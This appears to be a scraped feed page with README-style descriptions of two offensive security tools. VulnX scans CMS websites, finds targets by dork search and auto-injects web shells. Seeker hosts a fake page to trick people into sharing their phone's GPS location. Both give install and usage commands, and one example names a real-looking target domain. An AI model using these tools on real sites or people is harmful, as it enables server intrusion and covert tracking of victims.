Vulnx is An Intelligent Bot Auto Shell Injector that detect vulnerabilities in multiple types of Cms, fast cms detection,informations gathering and vulnerabilitie Scanning of the target like subdomains, ipaddresses, country, org, timezone, region, ans and more ...
Instead of injecting each and every shell manually like all the other tools do, VulnX analyses the target website checking the presence of a vulnerabilitie if so the shell will be Injected.searching urls with dorks Tool.

Features
  • Detect cms (wordpress, joomla, prestashop, drupal, opencart, magento, lokomedia)
  • Target informations gatherings
  • Target Subdomains gathering
  • Multi-threading on demand
  • Checks for vulnerabilities
  • Auto shell injector
  • Exploit dork searcher
  • Ports Scan High Level
  • Dns-Servers Dump
  • Input multiple target to scan.
  • Dorks Listing by Name& by ExploitName.
  • Export multiple target from Dorks into a logfile.

DNS-Map-Results
To do this,run a scan with the --dns flag and -d for subdomains. To generate a map of isetso.rnu.tn, you can run the command vulnx -u isetso.rnu.tn --dns -d --output $PATHin a new terminal.
$PATH : Where the graphs results will be stored.


Let's generates an image displaying target Subdomains,MX & DNS data.

Exploits


Joomla

Wordpress

Drupal

PrestaShop

Opencart

VulnxMode
NEW vulnx now have an interactive mode. URLSET


DORKSET


Available command line options
READ VULNX WIKI
usage: vulnx [options]

-u --url url target
-D --dorks search webs with dorks
-o --output specify output directory
-t --timeout http requests timeout
-c --cms-info search cms info[themes,plugins,user,version..]
-e --exploit searching vulnerability& run exploits
-w --web-info web informations gathering
-d --domain-info subdomains informations gathering
-l, --dork-list list names of dorks exploits
-n, --number-page number page of search engine(Google)
-p, --ports ports to scan
-i, --input specify domains to scan from an input file
--threads number of threads
--dns dns informations gathering

Docker
VulnX in DOCKER !!.
$ git clone https://github.com/anouarbensaad/VulnX.git
$ cd VulnX
$ docker build -t vulnx ./docker/
$ docker run -it --name vulnx vulnx:latest -u http://example.com
run vulnx container in interactive mode


to view logfiles mount it in a volume like so:
$ docker run -it --name vulnx -v "$PWD/logs:/VulnX/logs" vulnx:latest -u http://example.com
change the mounting directory..
VOLUME [ "$PATH" ]

Install vulnx on Ubuntu
$ git clone https://github.com/anouarbensaad/vulnx.git
$ cd VulnX
$ chmod +x install.sh
$ ./install.sh
Now run vulnx


Install vulnx on Termux
$ pkg update
$ pkg install -y git
$ git clone http://github.com/anouarbensaad/vulnx
$ cd vulnx
$ chmod +x install.sh
$ ./install.sh


Install vulnx in Windows
  • click here to download vulnx
  • download and install python3
  • unzip vulnx-master.zip in c:/
  • open the command prompt cmd.
> cd c:/vulnx-master
> python vulnx.py

example command with options : settimeout=3 , cms-gathering = all , -d subdomains-gathering , run --exploits
vulnx -u http://example.com --timeout 3 -c all -d -w --exploit

example command for searching dorks : -D or --dorks , -l --list-dorks
vulnx --list-dorks return table of exploits name. vulnx -D blaze return urls found with blaze dork

Versions



Seeker v1.1.9 - Accurately Locate Smartphones Using Social Engineering

$
0
0

Concept behind Seeker is simple, just like we host phishing pages to get credentials why not host a fake page that requests your location like many popular location based websites.
Seeker Hosts a fake website on In Built PHP Server and uses Serveo to generate a link which we will forward to the target, website asks for Location Permission and if the target allows it, we can get:
  • Longitude
  • Latitude
  • Accuracy
  • Altitude - Not always available
  • Direction - Only available if user is moving
  • Speed - Only available if user is moving
Along with Location Information we also get Device Information without any permissions :
  • Operating System
  • Platform
  • Number of CPU Cores
  • Amount of RAM - Approximate Results
  • Screen Resolution
  • GPU information
  • Browser Name and Version
  • Public IP Address
  • IP Address Reconnaissance
This tool is a Proof of Concept and is for Educational Purposes Only, Seeker shows what data a malicious website can gather about you and your devices and why you should not click on random links and allow critical permissions such as Location etc.

How is this Different from IP GeoLocation
  • Other tools and services offer IP Geolocation which is NOT accurate at all and does not give location of the target instead it is the approximate location of the ISP.
  • Seeker uses HTML API and gets Location Permission and then grabs Longitude and Latitude using GPS Hardware which is present in the device, so Seeker works best with Smartphones, if the GPS Hardware is not present, such as on a Laptop, Seeker fallbacks to IP Geolocation or it will look for Cached Coordinates.
  • Generally if a user accepts location permsission, Accuracy of the information recieved is accurate to approximately 30 meters, Accuracy Depends on the Device.
Note : On iPhone due to some reason location accuracy is approximately 65 meters.

Tested On :
  • Kali Linux 2019.2
  • BlackArch Linux
  • Ubuntu 19.04
  • Kali Nethunter
  • Termux
  • Parrot OS

Installation

Kali Linux / Ubuntu / Parrot OS
git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod 777 install.sh
./install.sh

BlackArch Linux
pacman -S seeker

Docker
# Install docker

curl -fsSL https://get.docker.com -o get-docker.sh
sh get-docker.sh

# Build Seeker

cd seeker/
docker build -t seeker .

# Launch seeker

docker run -t --rm seeker

# OR Pull from DockerHub

docker pull thewhiteh4t/seeker
docker run -t seeker

Termux
git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod 777 termux_install.sh
./termux_install.sh

Usage
python3 seeker.py -h

usage: seeker.py [-h] [-s SUBDOMAIN]

optional arguments:
-h, --help show this help message and exit
-s SUBDOMAIN, --subdomain Subdomain Provide Subdomain for Serveo URL ( Optional )
-k KML, --kml KML Provide KML Filename ( Optional )
-t TUNNEL, --tunnel TUNNEL Specify Tunnel Mode [manual]

# Example

# SERVEO
########
python3 seeker.py

# NGROK ETC.
############

# In First Terminal Start seeker in Manual mode like this
python3 seeker.py -t manual

# In Second Terminal Start Ngrok or any other tunnel service on port 8080
./ngrok http 8080

#-----------------------------------#

# Subdomain
###########
python3 seeker.py --subdomain google
python3 seeker.py -- tunnel manual --subdomain zomato

Known Problems
  • Services like Serveo and Ngrok are banned in some countries such as Russia etc., so if it's banned in your country you may not get a URL, if not then first READ CLOSED ISSUES, if your problem is not listed, create a new issue.

Demo



Viewing all 5839 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>